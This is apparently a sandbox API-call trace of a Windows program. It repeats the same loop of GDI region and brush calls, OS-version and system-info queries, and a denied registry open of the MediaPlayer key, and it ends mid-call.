[0092.359] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb90401d9 [0092.359] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047811 [0092.359] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047812 [0092.359] CombineRgn (hrgnDst=0x1047811, hrgnSrc1=0xb70401dc, hrgnSrc2=0xb90401d9, iMode=1) returned 1 [0092.359] CombineRgn (hrgnDst=0x1047812, hrgnSrc1=0xb70401dc, hrgnSrc2=0xb90401d9, iMode=4) returned 2 [0092.359] CreateSolidBrush (color=0xff) returned 0x2107810 [0092.360] CreateSolidBrush (color=0xff0000) returned 0x1107813 [0092.360] DeleteObject (ho=0x1107813) returned 1 [0092.360] DeleteObject (ho=0xb90401d9) returned 1 [0092.360] DeleteObject (ho=0xb70401dc) returned 1 [0092.360] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.360] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.360] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.360] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.360] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.360] BeginPath (hdc=0x0) returned 0 [0092.360] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.360] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.360] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.360] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.360] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.360] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.360] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.360] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.360] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xba0401d9 [0092.360] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb80401dc [0092.360] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047814 [0092.360] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047815 [0092.360] CombineRgn (hrgnDst=0x1047814, hrgnSrc1=0xba0401d9, hrgnSrc2=0xb80401dc, iMode=1) returned 1 [0092.360] CombineRgn (hrgnDst=0x1047815, hrgnSrc1=0xba0401d9, hrgnSrc2=0xb80401dc, iMode=4) returned 2 [0092.360] CreateSolidBrush (color=0xff) returned 0x2107813 [0092.360] CreateSolidBrush (color=0xff0000) returned 0x1107816 [0092.360] DeleteObject (ho=0x1107816) returned 1 [0092.360] DeleteObject (ho=0xb80401dc) returned 1 [0092.360] DeleteObject (ho=0xba0401d9) returned 1 [0092.360] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.360] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.360] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.360] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.360] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.360] BeginPath (hdc=0x0) returned 0 [0092.360] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.360] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.360] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.360] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.360] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.360] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.361] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.361] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.361] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb90401dc [0092.361] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbb0401d9 [0092.361] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047817 [0092.361] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047818 [0092.361] CombineRgn (hrgnDst=0x1047817, hrgnSrc1=0xb90401dc, hrgnSrc2=0xbb0401d9, iMode=1) returned 1 [0092.361] CombineRgn (hrgnDst=0x1047818, hrgnSrc1=0xb90401dc, hrgnSrc2=0xbb0401d9, iMode=4) returned 2 [0092.361] CreateSolidBrush (color=0xff) returned 0x2107816 [0092.361] CreateSolidBrush (color=0xff0000) returned 0x1107819 [0092.361] DeleteObject (ho=0x1107819) returned 1 [0092.361] DeleteObject (ho=0xbb0401d9) returned 1 [0092.361] DeleteObject (ho=0xb90401dc) returned 1 [0092.361] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.361] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.361] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.361] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.361] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.361] BeginPath (hdc=0x0) returned 0 [0092.361] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.361] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.361] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.361] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.361] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.361] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.361] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.361] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.361] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbc0401d9 [0092.361] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xba0401dc [0092.361] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104781a [0092.361] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104781b [0092.361] CombineRgn (hrgnDst=0x104781a, hrgnSrc1=0xbc0401d9, hrgnSrc2=0xba0401dc, iMode=1) returned 1 [0092.361] CombineRgn (hrgnDst=0x104781b, hrgnSrc1=0xbc0401d9, hrgnSrc2=0xba0401dc, iMode=4) returned 2 [0092.361] CreateSolidBrush (color=0xff) returned 0x2107819 [0092.361] CreateSolidBrush (color=0xff0000) returned 0x110781c [0092.362] DeleteObject (ho=0x110781c) returned 1 [0092.362] DeleteObject (ho=0xba0401dc) returned 1 [0092.362] DeleteObject (ho=0xbc0401d9) returned 1 [0092.362] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.362] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.362] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.362] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.362] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.362] BeginPath (hdc=0x0) returned 0 [0092.362] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.362] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.362] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.362] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.362] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.362] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.362] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.362] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.362] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbb0401dc [0092.362] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbd0401d9 [0092.362] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104781d [0092.362] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104781e [0092.362] CombineRgn (hrgnDst=0x104781d, hrgnSrc1=0xbb0401dc, hrgnSrc2=0xbd0401d9, iMode=1) returned 1 [0092.362] CombineRgn (hrgnDst=0x104781e, hrgnSrc1=0xbb0401dc, hrgnSrc2=0xbd0401d9, iMode=4) returned 2 [0092.362] CreateSolidBrush (color=0xff) returned 0x210781c [0092.362] CreateSolidBrush (color=0xff0000) returned 0x110781f [0092.362] DeleteObject (ho=0x110781f) returned 1 [0092.362] DeleteObject (ho=0xbd0401d9) returned 1 [0092.362] DeleteObject (ho=0xbb0401dc) returned 1 [0092.362] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.362] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.363] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.363] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.363] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.363] BeginPath (hdc=0x0) returned 0 [0092.363] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.363] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.363] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.363] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.363] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.363] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.363] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.363] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.363] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbe0401d9 [0092.363] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbc0401dc [0092.363] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047820 [0092.363] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047821 [0092.363] CombineRgn (hrgnDst=0x1047820, hrgnSrc1=0xbe0401d9, hrgnSrc2=0xbc0401dc, iMode=1) returned 1 [0092.363] CombineRgn (hrgnDst=0x1047821, hrgnSrc1=0xbe0401d9, hrgnSrc2=0xbc0401dc, iMode=4) returned 2 [0092.363] CreateSolidBrush (color=0xff) returned 0x210781f [0092.363] CreateSolidBrush (color=0xff0000) returned 0x1107822 [0092.363] DeleteObject (ho=0x1107822) returned 1 [0092.363] DeleteObject (ho=0xbc0401dc) returned 1 [0092.363] DeleteObject (ho=0xbe0401d9) returned 1 [0092.363] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.363] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.363] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.363] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.363] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.363] BeginPath (hdc=0x0) returned 0 [0092.363] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.363] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.363] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.363] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.363] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.363] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.364] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.364] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.364] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbd0401dc [0092.364] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbf0401d9 [0092.364] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047823 [0092.364] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047824 [0092.364] CombineRgn (hrgnDst=0x1047823, hrgnSrc1=0xbd0401dc, hrgnSrc2=0xbf0401d9, iMode=1) returned 1 [0092.364] CombineRgn (hrgnDst=0x1047824, hrgnSrc1=0xbd0401dc, hrgnSrc2=0xbf0401d9, iMode=4) returned 2 [0092.364] CreateSolidBrush (color=0xff) returned 0x2107822 [0092.364] CreateSolidBrush (color=0xff0000) returned 0x1107825 [0092.364] DeleteObject (ho=0x1107825) returned 1 [0092.364] DeleteObject (ho=0xbf0401d9) returned 1 [0092.364] DeleteObject (ho=0xbd0401dc) returned 1 [0092.364] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.364] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.364] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.364] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.364] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.364] BeginPath (hdc=0x0) returned 0 [0092.364] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.364] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.364] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.364] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.364] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.364] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.364] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.364] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.364] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc00401d9 [0092.364] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbe0401dc [0092.364] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047826 [0092.364] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047827 [0092.365] CombineRgn (hrgnDst=0x1047826, hrgnSrc1=0xc00401d9, hrgnSrc2=0xbe0401dc, iMode=1) returned 1 [0092.365] CombineRgn (hrgnDst=0x1047827, hrgnSrc1=0xc00401d9, hrgnSrc2=0xbe0401dc, iMode=4) returned 2 [0092.365] CreateSolidBrush (color=0xff) returned 0x2107825 [0092.365] CreateSolidBrush (color=0xff0000) returned 0x1107828 [0092.365] DeleteObject (ho=0x1107828) returned 1 [0092.365] DeleteObject (ho=0xbe0401dc) returned 1 [0092.365] DeleteObject (ho=0xc00401d9) returned 1 [0092.365] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.365] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.365] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.365] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.365] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.365] BeginPath (hdc=0x0) returned 0 [0092.365] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.365] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.365] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.365] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.365] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.365] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.365] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.365] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.365] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbf0401dc [0092.365] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc10401d9 [0092.365] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047829 [0092.365] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104782a [0092.365] CombineRgn (hrgnDst=0x1047829, hrgnSrc1=0xbf0401dc, hrgnSrc2=0xc10401d9, iMode=1) returned 1 [0092.365] CombineRgn (hrgnDst=0x104782a, hrgnSrc1=0xbf0401dc, hrgnSrc2=0xc10401d9, iMode=4) returned 2 [0092.365] CreateSolidBrush (color=0xff) returned 0x2107828 [0092.365] CreateSolidBrush (color=0xff0000) returned 0x110782b [0092.365] DeleteObject (ho=0x110782b) returned 1 [0092.365] DeleteObject (ho=0xc10401d9) returned 1 [0092.365] DeleteObject (ho=0xbf0401dc) returned 1 [0092.365] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.365] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.365] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.365] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.365] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.365] BeginPath (hdc=0x0) returned 0 [0092.365] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.365] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.366] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.366] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.366] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.366] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.366] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.366] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.366] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc20401d9 [0092.366] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc00401dc [0092.366] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104782c [0092.366] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104782d [0092.366] CombineRgn (hrgnDst=0x104782c, hrgnSrc1=0xc20401d9, hrgnSrc2=0xc00401dc, iMode=1) returned 1 [0092.366] CombineRgn (hrgnDst=0x104782d, hrgnSrc1=0xc20401d9, hrgnSrc2=0xc00401dc, iMode=4) returned 2 [0092.366] CreateSolidBrush (color=0xff) returned 0x210782b [0092.366] CreateSolidBrush (color=0xff0000) returned 0x110782e [0092.366] DeleteObject (ho=0x110782e) returned 1 [0092.366] DeleteObject (ho=0xc00401dc) returned 1 [0092.366] DeleteObject (ho=0xc20401d9) returned 1 [0092.366] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, 